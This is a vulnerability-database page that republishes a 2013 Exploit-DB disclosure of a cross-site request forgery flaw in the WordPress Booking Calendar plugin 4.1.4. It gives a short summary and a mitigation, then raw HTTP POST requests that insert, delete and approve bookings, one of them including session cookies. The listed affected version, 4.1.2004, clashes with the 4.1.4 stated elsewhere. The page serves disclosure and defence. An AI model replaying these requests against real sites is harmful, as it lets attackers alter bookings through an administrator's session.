CSRF Plugin Booking Calendar 4.1.4 ? WordPress

vendor:

Booking Calendar

by:

Dylan Irzi

8.8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: Booking Calendar

Affected Version From: 4.1.2004

Affected Version To: 4.1.2004

Patch Exists: NO

Related CWE: N/A

CPE: a:wpbookingcalendar:booking_calendar

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Win8 & Linux Mint

2013

CSRF Plugin Booking Calendar 4.1.4 ? WordPress

A vulnerability exists in the WordPress Booking Calendar plugin version 4.1.4, which allows an attacker to perform Cross-Site Request Forgery (CSRF) attacks. An attacker can add or delete bookings by sending a malicious POST request to the vulnerable application. The POST request contains the action to be performed, such as 'INSERT_INTO_TABLE' or 'DELETE_BY_ID', and the parameters required for the action.

Mitigation:

Implementing a CSRF token in the application can help mitigate this vulnerability.

Source

Exploit-DB raw data:

###########################################################################################
# Exploit Title: CSRF Plugin Booking Calendar 4.1.4 � WordPress
# Date: 04 de Agosto del 2013
# Exploit Author: Dylan Irzi
# Credit goes for: websecuritydev.com
# Vendor Homepage: http://wpbookingcalendar.com/
# Tested on: Win8 & Linux Mint
# Affected Version : 4.1.4
#
# Contacts: { https://twitter.com/Dylan_irzi11 , http://websecuritydev.com/}
# Greetz: all team WebSecuritydev.
###########################################################################################
CSRF VIA POST.

A�adir nuevo.
http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php

POST:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101
Firefox/22.0 AlexaToolbar/alxf-2.18
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer:
http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking-reservation
Content-Length: 311
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

-----------------------------------------------------------
ajax_action=INSERT_INTO_TABLE&bktype=1&dates=19.07.2013&form=text%5Ename1%5Etest~text%5Esecondname1%5Etest~email%5Eemail1%5Edylan.irzi%
40gmail.com
~text%5Ephone1%5Etest~textarea%5Edetails1%5Etest&captcha_chalange=&captcha_user_input=&is_send_emeils=1&my_booking_hash=&booking_form_type=&wpdev_active_locale=es_ES

---------------------------------------------------------
---------------------------------------------------------

Delete:
Url: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php

Post:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101
Firefox/22.0 AlexaToolbar/alxf-2.18
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer:
http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=4&view_mode=vm_listing&tab=actions
Content-Length: 104
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache


---------------------------

ajax_action=DELETE_APPROVE&booking_id=4&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES

---------------------------------------------------------
---------------------------------------------------------
<< Aprobar Evento >>
URL: http://localhost/wordpress/wp-content/plugins/booking/wpdev-booking.php

POST:
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) Gecko/20100101
Firefox/22.0 AlexaToolbar/alxf-2.18
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer:
http://localhost/wordpress/wp-admin/admin.php?page=booking/wpdev-booking.phpwpdev-booking&wh_booking_id=6&view_mode=vm_listing&tab=actions
Content-Length: 128
Cookie:
wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7C9f7f8aa8b2ea97a3464e6053c3c9f271;
wp-settings-time-1=1373853874; wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1374023744%7Cdd2c6fcb13e1f80327b123e484bd677b;
PHPSESSID=ica6bf0tjnajr0r2rcc1se1fl0
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

---------------------------------------------------------
ajax_action=UPDATE_APPROVE&booking_id=6&is_approve_or_pending=1&is_send_emeils=1&denyreason=&user_id=1&wpdev_active_locale=es_ES

---------------------------------------------------------
---------------------------------------------------------

-- 
*By Dylan Irzi
@Dylan_Irzi11
Pentest de Seguridad.
WhiteHat.
*